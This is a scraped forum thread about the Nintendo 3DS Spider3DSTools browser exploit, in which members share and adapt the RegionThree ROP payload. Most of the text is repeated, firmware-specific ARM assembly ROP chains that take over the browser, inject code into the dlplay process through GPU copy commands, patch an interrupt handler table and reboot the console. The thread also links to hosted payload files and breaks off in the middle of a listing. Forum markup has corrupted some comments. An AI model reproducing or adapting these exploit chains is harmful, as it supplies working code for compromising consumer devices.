Homebrew [Custom Launcher] Spider3DSTools released
- Thread starter Lord Prime
- Start date
- Views 144,595
- Replies 748
- Likes 17
- Joined
- Oct 16, 2009
- Messages
- 1,064
- Trophies
- 1
- Age
- 28
- Location
- The dark part of your house
- XP
- 2,565
- Country
Could someone perhaps compile https://github.com/yifanlu/Spider3DSTools/wiki/RegionThree-Loading please maybe duke_srg could?
duke_srg
duke_srg
I think it would be able to,Since this exploit digs in ram and changes it
Miis are stored on the SD, and are possible to change via extData.
- Joined
- Oct 16, 2009
- Messages
- 1,064
- Trophies
- 1
- Age
- 28
- Location
- The dark part of your house
- XP
- 2,565
- Country
I am currently compiling a list of the spider exploit homebrews where you can submit yours here http://goo.gl/forms/MRasWq7cpS
And it will be added to a page made available soon
And it will be added to a page made available soon
I'll try to do so today as soon as LoadCode parameter passing to code will be fixed. But are you sure you need it, it is the same regionthree but with no ROP/Launcher.DAT file on the SD.
- Joined
- Oct 16, 2009
- Messages
- 1,064
- Trophies
- 1
- Age
- 28
- Location
- The dark part of your house
- XP
- 2,565
- Country
Well it's just easier
and would be nice as it could also add compatibility considering its not launching files on an SD Card and its using a different exploitEDIT: Also my anti virus blocks your website for some reason
EDIT2: Also its annoying constantly moving files on my SD Card
Yes it will be a bit easier. I also will check code loading from site and injecting to the web partpayload, as it seems no one knows the ROP size limitWell it's just easier
EDIT: Also my anti virus blocks your website for some reason
Which page? Anyway blame your paranoid mode antivirus
- Joined
- Oct 16, 2009
- Messages
- 1,064
- Trophies
- 1
- Age
- 28
- Location
- The dark part of your house
- XP
- 2,565
- Country
Yes it will be a bit easier. I also will check code loading from site and injecting to the web partpayload, as it seems no one knows the ROP size limit
Which page? Anyway blame your paranoid mode antivirus
All of them D: avast doesnt like your site it might be because of no-ip idk I've got it disabled atm
yifan_lu converted and built your RegionThree ROP with ARB-EABI toolchain - init data values are in wrong places
ups: oops, accidently pasted smea's version. NM
Just in case someone wants to build a spider_rop payload with this toolchain
[/spoiler
ups: oops, accidently pasted smea's version. NM
Just in case someone wants to build a spider_rop payload with this toolchain
Code:
.arm
.text
@define constants
#define DLPLAY_CODE_LOC_VA 0x00192800
#define DLPLAY_CODE_LOC (DLPLAY_CODE_LOC_VA-0x00100000+0x03F50000+0x14000000)
#define DLPLAY_HOOK_LOC (0x03FF3500+0x14000000)
#define DLPLAY_NSSHANDLE_LOC_VA 0x001A5200
#define SPIDER_GSPHEAPBUF 0x18370000
#define SPIDER_ROP_LOC 0x08B88400
.global _start
spiderRop:
@copy code to dlplay
@copy patch
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word SPIDER_GSPHEAPBUF @ r0 (dst)
.word SPIDER_ROP_LOC+dlplayCode @ r1 (src)
.word dlplayCode_end-dlplayCode @ r2 (size)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x00240B54 @ memcpy (ends in LDMFD SP!, {R4-R10,LR})
.word 0xDEADC0DE @ r4 (garbage)
.word 0xDEADC0DE @ r5 (garbage)
.word 0xDEADC0DE @ r6 (garbage)
.word 0xDEADC0DE @ r7 (garbage)
.word 0xDEADC0DE @ r8 (garbage)
.word 0xDEADC0DE @ r9 (garbage)
.word 0xDEADC0DE @ r10 (garbage)
[USER=273536]flush[/USER] data cache
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003DA72C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012c1e0 @ GSPGPU_FlushDataCache
@send GX command
.word 0x0010c2fc @ pop {r0, pc}
.word 0x3D7C40+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00228af4 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand @ r1 (cmd addr)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012BF04 @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
[USER=68715]sleep[/USER] for a bit
.word 0x0010c2fc @ pop {r0, pc}
.word 500000000 @ r0 (half second)
.word 0x00228af4 @ pop {r1, pc}
.word 0x00000000 @ r1 (nothing)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x001041f8 @ svc 0xa | bx lr
@copy gsp interrupt handler table to linear heap
[USER=273536]flush[/USER] data cache
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003DA72C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012c1e0 @ GSPGPU_FlushDataCache
@send GX command
.word 0x0010c2fc @ pop {r0, pc}
.word 0x3D7C40+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00228af4 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand2 @ r1 (cmd addr)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012BF04 @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
[USER=68715]sleep[/USER] for a bit
.word 0x0010c2fc @ pop {r0, pc}
.word 500000000 @ r0 (half second)
.word 0x00228af4 @ pop {r1, pc}
.word 0x00000000 @ r1 (nothing)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x001041f8 @ svc 0xa | bx lr
@ needed for ROP
.word 0x001946EB @ POP {R0-R4,R7,PC}
.word SPIDER_ROP_LOC+0x8C @ r0 (garbage)
.word 0xDEADC0DE @ r1 (garbage)
.word 0xDEADC0DE @ r2 (garbage)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0xDEADC0DE @ r7 (garbage)
@copy gsp interrupt handler table back to dlplay after patching it
@patch table
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word SPIDER_GSPHEAPBUF+0x90 @ r0 (dst)
.word SPIDER_ROP_LOC+dlplayHook @ r1 (src)
.word dlplayHook_end-dlplayHook @ r2 (size)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x00240B54 @ memcpy (ends in LDMFD SP!, {R4-R10,LR})
.word SPIDER_ROP_LOC @ r4 (needed for rop)
.word 0x001057C4 @ r5 (needed for rop)
.word 0x001057C4 @ r6 (needed for rop)
.word 0xDEADC0DE @ r7 (garbage)
.word 0xDEADC0DE @ r8 (garbage)
.word 0xDEADC0DE @ r9 (garbage)
.word 0xDEADC0DE @ r10 (garbage)
@ needed for ROP
.word 0x001946EB @ POP {R0-R4,R7,PC}
.word 0xDEADC0DE @ r0 (garbage)
.word 0xDEADC0DE @ r1 (garbage)
.word 0xDEADC0DE @ r2 (garbage)
.word 0xDEADC0DE @ r3 (garbage)
.word 0x0010C2FC @ r4 (needed for rop)
.word SPIDER_ROP_LOC+0x218 @ r7 (needed for rop)
@ needed for ROP
.word 0x001946EB @ POP {R0-R4,R7,PC}
.word 0xDEADC0DE @ r0 (garbage)
.word 0x001057C4 @ r1 (garbage)
.word 0xDEADC0DE @ r2 (garbage)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0xDEADC0DE @ r7 (garbage)
[USER=273536]flush[/USER] data cache
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003DA72C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012c1e0 @ GSPGPU_FlushDataCache
@send GX command
.word 0x0010c2fc @ pop {r0, pc}
.word 0x3D7C40+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00228af4 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand3 @ r1 (cmd addr)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012BF04 @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
@trigger spider crash to return to menu
.word 0xFFFFFFFF
@ copy code stub to end of dlplay .text
.align 0x4
gxCommand:
.word 0x00000004 @command header (SetTextureCopy)
.word SPIDER_GSPHEAPBUF [USER=64882]source[/USER] address
.word DLPLAY_CODE_LOC @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
@ needed for ROP
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0xDEADC0DE
myself:
.word SPIDER_ROP_LOC+myself
.word 0x001057C4
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0x00130344
@ copy gsp interrupt handler ptr table to spider linear heap
.align 0x4
gxCommand2:
.word 0x00000004 @command header (SetTextureCopy)
.word DLPLAY_HOOK_LOC [USER=64882]source[/USER] address
.word SPIDER_GSPHEAPBUF @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
@ copy gsp interrupt handler ptr table back to dplay for spider linear heap
.align 0x4
gxCommand3:
.word 0x00000004 @command header (SetTextureCopy)
.word SPIDER_GSPHEAPBUF [USER=64882]source[/USER] address
.word DLPLAY_HOOK_LOC @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00130344 @ unused
.align 0x4
dlplayCode:
ldr r0, =DLPLAY_NSSHANDLE_LOC_VA @ ns:s handle location
ldr r0, [r0]
mrc p15, 0, r1, c13, c0, 3
add r1, #0x80
ldr r2, =0x00100180 @ NSS:RebootSystem
str r2, [r1], #4
ldr r2, =0x00000001 @ flag
str r2, [r1], #4
ldr r2, =0x00000000 @ lower word PID (0 for gamecard)
str r2, [r1], #4
ldr r2, =0x00000000 @ upper word PID
str r2, [r1], #4
ldr r2, =0x00000002 @ mediatype (2 for gamecard)
str r2, [r1], #4
ldr r2, =0x00000000 @ reserved
str r2, [r1], #4
ldr r2, =0x00000000 @ flag
str r2, [r1], #4
.word 0xef000032 @ svc 0x32 (sendsyncrequest)
[USER=68715]sleep[/USER] forever and ever...
ldr r0, =0xFFFFFFFF
ldr r1, =0x0FFFFFFF
.word 0xef00000a @ svc 0xa (sleep)
.pool
dlplayCode_end:
.align 0x4
dlplayHook:
.word DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA
.word DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA
dlplayHook_end:
While we're on the subject of messing around with Miis, is there any chance we could auto-complete Mii Plaza puzzles and unlock all hats this way as well? Eventually, anyway.
Just noticed, 7-th value in InitData (the last 0x001057C4) seems not needed, it was not in the original GW ROP and at least ARM code is launched normally from ROP without tis value set.
I managed to adopt smealum's RegionThree code for 4.x into ROP-only code, just like yifan_lu version for 9.x
Can do this for 5x/6x code version, is anybody interested and able to test the result?
upd: optimized and converted the code for arm-none-eabi-gcc the code, please check on 4x and 5x/6x:
(also available at http://dukesrg.no-ip.org/3ds/rop?RegionThree.dat, http://dukesrg.no-ip.org/3ds/rop?RegionThree4.dat and http://dukesrg.no-ip.org/3ds/rop?RegionThree5.dat)
Later will try to relocate GX commands data to deadcode, that may reduce the code for upto 96 bytes less.
[/spioler]
[/spioler]
[/spioler]
Can do this for 5x/6x code version, is anybody interested and able to test the result?
upd: optimized and converted the code for arm-none-eabi-gcc the code, please check on 4x and 5x/6x:
(also available at http://dukesrg.no-ip.org/3ds/rop?RegionThree.dat, http://dukesrg.no-ip.org/3ds/rop?RegionThree4.dat and http://dukesrg.no-ip.org/3ds/rop?RegionThree5.dat)
Later will try to relocate GX commands data to deadcode, that may reduce the code for upto 96 bytes less.
Code:
.arm
.text
@define constants
#define DLPLAY_CODE_LOC_VA 0x00192800
#define DLPLAY_CODE_LOC (DLPLAY_CODE_LOC_VA-0x00100000+0x03F50000+0x14000000)
#define DLPLAY_HOOK_LOC (0x03FF3500+0x14000000)
#define DLPLAY_NSSHANDLE_LOC_VA 0x001A5200
#define SPIDER_GSPHEAPBUF 0x18370000
#define SPIDER_ROP_LOC 0x08B88400
.global _start
spiderRop:
@copy code to dlplay
@copy patch
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word SPIDER_GSPHEAPBUF @ r0 (dst)
.word SPIDER_ROP_LOC+dlplayCode @ r1 (src)
.word dlplayCode_end-dlplayCode @ r2 (size)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x00240B54 @ memcpy (ends in LDMFD SP!, {R4-R10,LR})
.word 0xDEADC0DE @ r4 (garbage)
.word 0xDEADC0DE @ r5 (garbage)
.word 0xDEADC0DE @ r6 (garbage)
.word 0xDEADC0DE @ r7 (garbage)
.word 0xDEADC0DE @ r8 (garbage)
.word 0xDEADC0DE @ r9 (garbage)
.word 0xDEADC0DE @ r10 (garbage)
[USER=273536]flush[/USER] data cache
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003DA72C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012c1e0 @ GSPGPU_FlushDataCache
@send GX command
.word 0x0010c2fc @ pop {r0, pc}
.word 0x3D7C40+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00228af4 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand @ r1 (cmd addr)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012BF04 @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
[USER=68715]sleep[/USER] for a bit
.word 0x0010c2fc @ pop {r0, pc}
.word 500000000 @ r0 (half second)
.word 0x00228af4 @ pop {r1, pc}
.word 0x00000000 @ r1 (nothing)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x001041f8 @ svc 0xa | bx lr
@copy gsp interrupt handler table to linear heap
[USER=273536]flush[/USER] data cache
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003DA72C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012c1e0 @ GSPGPU_FlushDataCache
@send GX command
.word 0x0010c2fc @ pop {r0, pc}
.word 0x3D7C40+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00228af4 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand2 @ r1 (cmd addr)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012BF04 @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
[USER=68715]sleep[/USER] for a bit
.word 0x0010c2fc @ pop {r0, pc}
.word 500000000 @ r0 (half second)
.word 0x00228af4 @ pop {r1, pc}
.word 0x00000000 @ r1 (nothing)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x001041f8 @ svc 0xa | bx lr
@ needed for ROP
.word 0x0010C2FC @ pop {r0, pc}
.word SPIDER_ROP_LOC+0x8C @ r0 InitData 1
@copy gsp interrupt handler table back to dlplay after patching it
@patch table
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word SPIDER_GSPHEAPBUF+0x90 @ r0 (dst)
.word SPIDER_ROP_LOC+dlplayHook @ r1 (src)
.word dlplayHook_end-dlplayHook @ r2 (size)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x00240B54 @ memcpy (ends in LDMFD SP!, {R4-R10,LR})
.word 0xDEADC0DE @ r4 (garbage)
.word 0xDEADC0DE @ r5 (garbage)
.word 0xDEADC0DE @ r6 (garbage)
.word 0xDEADC0DE @ r7 (garbage)
.word 0xDEADC0DE @ r8 (garbage)
.word SPIDER_ROP_LOC @ r9 (needed for rop) InitData 2
.word 0x001057C4 @ r10 (needed for rop) InitData 3
.word 0x001057C4 @ POP {PC} (needed for rop) InitData 4
[USER=273536]flush[/USER] data cache
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003DA72C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012c1e0 @ GSPGPU_FlushDataCache
@ needed for ROP
.word 0x0010C2FC @ pop {r0, pc} (needed for rop) InitData 5
.word SPIDER_ROP_LOC+0x218 @ r7 (needed for rop) InitData 6
@send GX command
.word 0x0010c2fc @ pop {r0, pc}
.word 0x3D7C40+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00228af4 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand3 @ r1 (cmd addr)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012BF04 @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
@trigger spider crash to return to menu
.word 0xFFFFFFFF
@ copy code stub to end of dlplay .text
.align 0x4
gxCommand:
.word 0x00000004 @command header (SetTextureCopy)
.word SPIDER_GSPHEAPBUF [USER=64882]source[/USER] address
.word DLPLAY_CODE_LOC @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
@ copy gsp interrupt handler ptr table to spider linear heap
.align 0x4
gxCommand2:
.word 0x00000004 @command header (SetTextureCopy)
.word DLPLAY_HOOK_LOC [USER=64882]source[/USER] address
.word SPIDER_GSPHEAPBUF @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
@ copy gsp interrupt handler ptr table back to dplay for spider linear heap
.align 0x4
gxCommand3:
.word 0x00000004 @command header (SetTextureCopy)
.word SPIDER_GSPHEAPBUF [USER=64882]source[/USER] address
.word DLPLAY_HOOK_LOC @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
.align 0x4
dlplayHook:
.word DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA
.word DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA
dlplayHook_end:
myself:
.word SPIDER_ROP_LOC+myself @ Self 1
.word 0x001057C4 @ Self 2
.fill 7, 4, 0xDEADC0DE
.word 0x00130344 @ Self 3
.align 0x4
dlplayCode:
ldr r0, =DLPLAY_NSSHANDLE_LOC_VA @ ns:s handle location
ldr r0, [r0]
mrc p15, 0, r1, c13, c0, 3
add r1, #0x80
ldr r2, =0x00100180 @ NSS:RebootSystem
str r2, [r1], #4
ldr r2, =0x00000001 @ flag
str r2, [r1], #4
ldr r2, =0x00000000 @ lower word PID (0 for gamecard)
str r2, [r1], #4
ldr r2, =0x00000000 @ upper word PID
str r2, [r1], #4
ldr r2, =0x00000002 @ mediatype (2 for gamecard)
str r2, [r1], #4
ldr r2, =0x00000000 @ reserved
str r2, [r1], #4
ldr r2, =0x00000000 @ flag
str r2, [r1], #4
.word 0xef000032 @ svc 0x32 (sendsyncrequest)
[USER=68715]sleep[/USER] forever and ever...
ldr r0, =0xFFFFFFFF
ldr r1, =0x0FFFFFFF
.word 0xef00000a @ svc 0xa (sleep)
.pool
dlplayCode_end:
Code:
.arm
.text
@define constants
#define DLPLAY_CODE_LOC_VA 0x00192800
#define DLPLAY_CODE_LOC (DLPLAY_CODE_LOC_VA-0x00100000+0x03F50000+0x14000000-0x4000)
#define DLPLAY_HOOK_LOC (0x1A3500-0x00100000+0x03F50000+0x14000000-0x4000)
#define DLPLAY_NSSHANDLE_LOC_VA 0x001A5200
#define SPIDER_GSPHEAPBUF 0x18410000
#define SPIDER_ROP_LOC 0x08B47400
.global _start
spiderRop:
@copy code to dlplay
@copy patch
.word 0x0029C170 @ LDMFD SP!, {R0-R4,PC}
.word SPIDER_GSPHEAPBUF @ r0 (dst)
.word SPIDER_ROP_LOC+dlplayCode @ r1 (src)
.word dlplayCode_end-dlplayCode @ r2 (size)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x0029BF64 @ memcpy (ends in LDMFD SP!, {R4-R10,LR})
.word 0xDEADC0DE @ r4 (garbage)
.word 0xDEADC0DE @ r5 (garbage)
.word 0xDEADC0DE @ r6 (garbage)
.word 0xDEADC0DE @ r7 (garbage)
.word 0xDEADC0DE @ r8 (garbage)
.word 0xDEADC0DE @ r9 (garbage)
.word 0xDEADC0DE @ r10 (garbage)
[USER=273536]flush[/USER] data cache
.word 0x0029C170 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003B643C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x002D6A34 @ pop {lr, pc}
.word 0x0010DB6C @ lr (pop {pc})
.word 0x00344C2C @ GSPGPU_FlushDataCache
@send GX command
.word 0x002AD574 @ pop {r0, pc}
.word 0x003F54E8+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00269758 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand @ r1 (cmd addr)
.word 0x002D6A34 @ pop {lr, pc}
.word 0x0010DB6C @ lr (pop {pc})
.word 0x002CF3EC @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
[USER=68715]sleep[/USER] for a bit
.word 0x002AD574 @ pop {r0, pc}
.word 500000000 @ r0 (half second)
.word 0x00269758 @ pop {r1, pc}
.word 0x00000000 @ r1 (nothing)
.word 0x002D6A34 @ pop {lr, pc}
.word 0x0010DB6C @ lr (pop {pc})
.word 0x002A513C @ svc 0xa | bx lr
@copy gsp interrupt handler table to linear heap
[USER=273536]flush[/USER] data cache
.word 0x0029C170 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003B643C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x002D6A34 @ pop {lr, pc}
.word 0x0010DB6C @ lr (pop {pc})
.word 0x00344C2C @ GSPGPU_FlushDataCache
@send GX command
.word 0x002AD574 @ pop {r0, pc}
.word 0x003F54E8+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00269758 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand2 @ r1 (cmd addr)
.word 0x002D6A34 @ pop {lr, pc}
.word 0x0010DB6C @ lr (pop {pc})
.word 0x002CF3EC @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
[USER=68715]sleep[/USER] for a bit
.word 0x002AD574 @ pop {r0, pc}
.word 500000000 @ r0 (half second)
.word 0x00269758 @ pop {r1, pc}
.word 0x00000000 @ r1 (nothing)
.word 0x002D6A34 @ pop {lr, pc}
.word 0x0010DB6C @ lr (pop {pc})
.word 0x002A513C @ svc 0xa | bx lr
@ needed for ROP
.word 0x002AD574 @ pop {r0, pc}
.word SPIDER_ROP_LOC+0x8C @ r0 InitData 1
@copy gsp interrupt handler table back to dlplay after patching it
@patch table
.word 0x0029C170 @ LDMFD SP!, {R0-R4,PC}
.word SPIDER_GSPHEAPBUF+0x90 @ r0 (dst)
.word SPIDER_ROP_LOC+dlplayHook @ r1 (src)
.word dlplayHook_end-dlplayHook @ r2 (size)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x0029BF64 @ memcpy (ends in LDMFD SP!, {R4-R10,LR})
.word 0xDEADC0DE @ r4 (garbage)
.word 0xDEADC0DE @ r5 (garbage)
.word 0xDEADC0DE @ r6 (garbage)
.word 0xDEADC0DE @ r7 (garbage)
.word 0xDEADC0DE @ r8 (garbage)
.word SPIDER_ROP_LOC @ r9 (needed for rop) InitData 2
.word 0x0010DB6C @ r10 (needed for rop) InitData 3
.word 0x0010DB6C @ POP {PC} (needed for rop) InitData 4
[USER=273536]flush[/USER] data cache
.word 0x0029C170 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003B643C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x002D6A34 @ pop {lr, pc}
.word 0x0010DB6C @ lr (pop {pc})
.word 0x00344C2C @ GSPGPU_FlushDataCache
@ needed for ROP
.word 0x002AD574 @ pop {r0, pc} (needed for rop) InitData 5
.word SPIDER_ROP_LOC+0x218 @ r7 (needed for rop) InitData 6
@send GX command
.word 0x002AD574 @ pop {r0, pc}
.word 0x003F54E8+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00269758 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand3 @ r1 (cmd addr)
.word 0x002D6A34 @ pop {lr, pc}
.word 0x0010DB6C @ lr (pop {pc})
.word 0x002CF3EC @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
@trigger spider crash to return to menu
.word 0xFFFFFFFF
@ copy code stub to end of dlplay .text
.align 0x4
gxCommand:
.word 0x00000004 @command header (SetTextureCopy)
.word SPIDER_GSPHEAPBUF [USER=64882]source[/USER] address
.word DLPLAY_CODE_LOC @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
@ copy gsp interrupt handler ptr table to spider linear heap
.align 0x4
gxCommand2:
.word 0x00000004 @command header (SetTextureCopy)
.word DLPLAY_HOOK_LOC [USER=64882]source[/USER] address
.word SPIDER_GSPHEAPBUF @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
@ copy gsp interrupt handler ptr table back to dplay for spider linear heap
.align 0x4
gxCommand3:
.word 0x00000004 @command header (SetTextureCopy)
.word SPIDER_GSPHEAPBUF [USER=64882]source[/USER] address
.word DLPLAY_HOOK_LOC @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
.align 0x4
dlplayHook:
.word DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA
.word DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA
dlplayHook_end:
myself:
.word SPIDER_ROP_LOC+myself @ Self 1
.word 0x0010DB6C @ Self 2
.fill 7, 4, 0xDEADC0DE
.word 0x002D6A1C @ Self 3
.align 0x4
dlplayCode:
ldr r0, =DLPLAY_NSSHANDLE_LOC_VA @ ns:s handle location
ldr r0, [r0]
mrc p15, 0, r1, c13, c0, 3
add r1, #0x80
ldr r2, =0x00100180 @ NSS:RebootSystem
str r2, [r1], #4
ldr r2, =0x00000001 @ flag
str r2, [r1], #4
ldr r2, =0x00000000 @ lower word PID (0 for gamecard)
str r2, [r1], #4
ldr r2, =0x00000000 @ upper word PID
str r2, [r1], #4
ldr r2, =0x00000002 @ mediatype (2 for gamecard)
str r2, [r1], #4
ldr r2, =0x00000000 @ reserved
str r2, [r1], #4
ldr r2, =0x00000000 @ flag
str r2, [r1], #4
.word 0xef000032 @ svc 0x32 (sendsyncrequest)
[USER=68715]sleep[/USER] forever and ever...
ldr r0, =0xFFFFFFFF
ldr r1, =0x0FFFFFFF
.word 0xef00000a @ svc 0xa (sleep)
.pool
dlplayCode_end:
Code:
.arm
.text
@define constants
#define DLPLAY_CODE_LOC_VA 0x00192800
#define DLPLAY_CODE_LOC (DLPLAY_CODE_LOC_VA-0x00100000+0x03F50000+0x14000000)
#define DLPLAY_HOOK_LOC (0x1A3500-0x00100000+0x03F50000+0x14000000)
